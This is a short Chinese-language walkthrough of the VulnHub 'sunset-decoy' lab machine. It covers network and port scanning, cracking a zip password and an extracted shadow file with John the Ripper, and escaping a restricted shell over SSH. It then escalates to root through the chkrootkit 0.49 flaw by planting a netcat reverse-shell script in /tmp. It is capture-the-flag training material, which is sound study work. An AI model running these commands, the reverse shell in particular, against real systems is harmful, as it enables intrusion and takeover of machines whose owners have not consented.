今天实践的是vulnhub的sunset-decoy镜像，

下载地址，https://download.vulnhub.com/sunset/decoy.ova，

用virtualbox导入，做地址扫描，

sudo netdiscover -r 192.168.0.0/24，有地址了，190就是，

再继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.190，

浏览器访问http://192.168.0.190，

下载save.zip，解压发现需要密码，

准备破解密码的hash文件，zip2john save.zip > pass.hash，

破解，john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash，

获取到解压密码，manuel，解压后发现里面有密码hash文件，

破解，john --wordlist=/usr/share/wordlists/rockyou.txt etc/shadow,

获取到用户名296640a3b825115a47b68fc44501c828的密码server，

ssh登录到靶机，

ssh [email protected] -t "bash --noprofile"，

查看日志文件，/bin/cat log.txt，

获取到chkrootkit-0.49信息，

查找可利用的漏洞，searchsploit chkrootkit，

进一步查看利用方法，searchsploit -p 33899，

cat /usr/share/exploitdb/exploits/linux/local/33899.txt，

说是让在tmp目录创建个update文件，

进入tmp目录，cd /tmp，写个反弹shell脚本，

echo "/usr/bin/nc 192.168.0.189 4444 -e /bin/sh" > update，

给脚本开执行权限，/bin/chmod 777 update，

kali攻击机上用nc开个反弹shell监听，nc -lvp 4444，

回到用户目录下执行honeypot.decoy，选择第5项，病毒扫描，

稍等一会儿，反弹shell就过来了，id确认是root，